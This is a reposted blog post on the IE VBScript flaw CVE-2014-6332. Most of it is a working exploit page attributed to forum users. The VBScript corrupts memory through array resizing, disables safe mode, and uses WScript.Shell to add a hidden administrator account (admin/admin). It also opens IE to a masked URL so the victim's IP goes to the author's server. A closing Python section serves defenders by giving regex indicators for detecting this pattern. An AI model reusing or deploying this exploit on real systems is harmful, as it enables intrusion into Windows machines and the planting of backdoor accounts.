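Microsoft's security update this month fixed an IE remote code execution vulnerability (CVE-2014-6332) that had lain hidden for 18 years; you could say it gave Windows a big tonic pill. The flaw is in the VBScript code and has been there ever since Windows 95 was first released (19 years ago). Yuange's tears are streaming. Any IE at all will pop the calculator.
About the Microsoft security patch
Microsoft has disclosed a high-severity vulnerability that exists in all versions of Windows. All Windows users, especially those who run websites, are advised to install the patch Microsoft released on Tuesday as soon as possible.
POC 1: pop Notepad (By yuange1975)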
CVE-2014-6332 alliedve.htm allie(win95+ie3-win10+ie11) dve copy by yuange in 2009
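Using the latest vulnerability I wrote an XX web page; once any IE opens it, a new user named admin is added, with the password admin as well. Sharing it with everyone.
The vulnerability write-up I read: http://www.nigesb.com/cve-2014-6332-poc.html
Test screenshot
POC 2: execute CMD commands and add a new user (By qiujianzhong)
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <!--[if !IE]><!--> This website currently supports only IE; please open this page in IE <!--<![endif]--><br><!--[if IE]> Sorry, you do not have permission to open this page; please contact the administrator <![endif]-->
<!--#####Prerequisites for exploiting the vulnerability: IE is used, the vulnerability is unpatched, 360 is not running############################################--><!--#####After this page is opened in IE, the computer will create a new user named admin, with the password admin as well, and send the IP to one's own server######--><!--#####To create a hidden account, see http://www.vfocus.net/art/20090420/4976.html###########################--><!--##################### make by Anders #######################################-->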
<!doctype html><html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body> <SCRIPT LANGUAGE="VBScript"> function runmumaa()On Error Resume Nextset shell=createobject("wscript.shell")shell.run "net user admin admin /add",0shell.run "net localgroup administrators admin /add",0shell.run "iexplore"" http://www.***的网页.com",0end function </script> <SCRIPT LANGUAGE="VBScript">
dim aa()dim ab()dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin() function Begin() On Error Resume Next info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else exit function
end if
win9x=0
BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE") document.write(intVersion) runshellcode()
else
setnotsafemode() end if end ifend function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end function function Create() On Error Resume Next dim i
Create=False For i = 0 To 400 If Over()=True Then ' document.write(i)
Create=True Exit For End If Nextend function
sub testaa()end sub
function mydata() On Error Resume Next i=testaa
i=null redim Preserve aa(a2)
ab(0)=0 aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1) redim Preserve aa(a0)
end function
function setnotsafemode() On Error Resume Next i=mydata()
i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134)
for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0)
j=0 j=readmemo(i+&h120+k)
Exit for end if
next
ab(2)=1.69759663316747E-313 runmumaa()end function function Over() On Error Resume Next dim type1,type2,type3
Over=False a0=a0+a3
a1=a0+2 a2=a0+&h8000000
redim Preserve aa(a0) redim ab(a0)
redim Preserve aa(a2)
type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1)) end if
end if else redim Preserve aa(a0) exit function
end if else if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if
end if end if end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then Over=True win9x=1 End If
redim Preserve aa(a0)
end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)end function </script> </body></html>
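For defenders triaging captured HTML (proxy cache, mail attachments, web-server uploads), the traits of the PoC above can be matched statically. The following is an added example, not part of the original post: the indicator names, the verdict labels and the combination logic are assumptions made for illustration, and the sample strings are constructed from short, non-functional fragments of the page.

```python
import re

# Indicators taken from traits visible in the PoC on this page. The names and
# the way they are combined are assumptions of this example, not a vendor rule.
INDICATORS = {
    "vbscript_block": re.compile(r'<script[^>]*language\s*=\s*["\']?vbscript', re.I),
    "ie_emulation": re.compile(r'X-UA-Compatible[^>]*IE=EmulateIE\d+', re.I),
    "redim_preserve": re.compile(r'redim\s+preserve\s+\w+\s*\(', re.I),
    # Array bound built from a very large hex constant such as &h8000000.
    "huge_array_bound": re.compile(r'&h[0-9a-f]{7,8}\b', re.I),
    # Subnormal double literals like the PoC's ab(0)=...E-313 assignments.
    "subnormal_double": re.compile(r'\d\.\d+E-31[0-9]', re.I),
    "shell_object": re.compile(r'createobject\s*\(\s*"wscript\.shell"', re.I),
    "account_change": re.compile(r'net\s+(?:user|localgroup)\b[^"]*/add', re.I),
}

def scan(html):
    """Return (verdict, sorted indicator names) for one HTML document."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(html))
    seen = set(hits)
    # Array-resize trick: VBScript + redim Preserve + oversized bound or raw doubles.
    if {"vbscript_block", "redim_preserve"} <= seen and \
            seen & {"huge_array_bound", "subnormal_double"}:
        return "cve-2014-6332-pattern", hits
    # Browser-hosted VBScript has no legitimate need for WScript.Shell.
    if "vbscript_block" in seen and seen & {"shell_object", "account_change"}:
        return "suspicious-vbscript", hits
    return "no-match", hits

# Constructed samples: isolated fragments, not working pages.
SAMPLE_FLAGGED = '''<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
<SCRIPT LANGUAGE="VBScript">
a2=a0+&h8000000
redim Preserve aa(a2)
ab(0)=1.69759663316747E-313
</script>'''
SAMPLE_SHELL = '''<script language="VBScript">
set shell=createobject("wscript.shell")
</script>'''
SAMPLE_BENIGN = '''<script language="VBScript">
dim items()
redim Preserve items(10)
</script>'''

if __name__ == "__main__":
    for name in ("SAMPLE_FLAGGED", "SAMPLE_SHELL", "SAMPLE_BENIGN"):
        print(name, scan(globals()[name]))
```

A "no-match" verdict only means these textual traits are absent; obfuscated script needs to be decoded before scanning.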
Reposted from: https://blog.51cto.com/3451836/1585643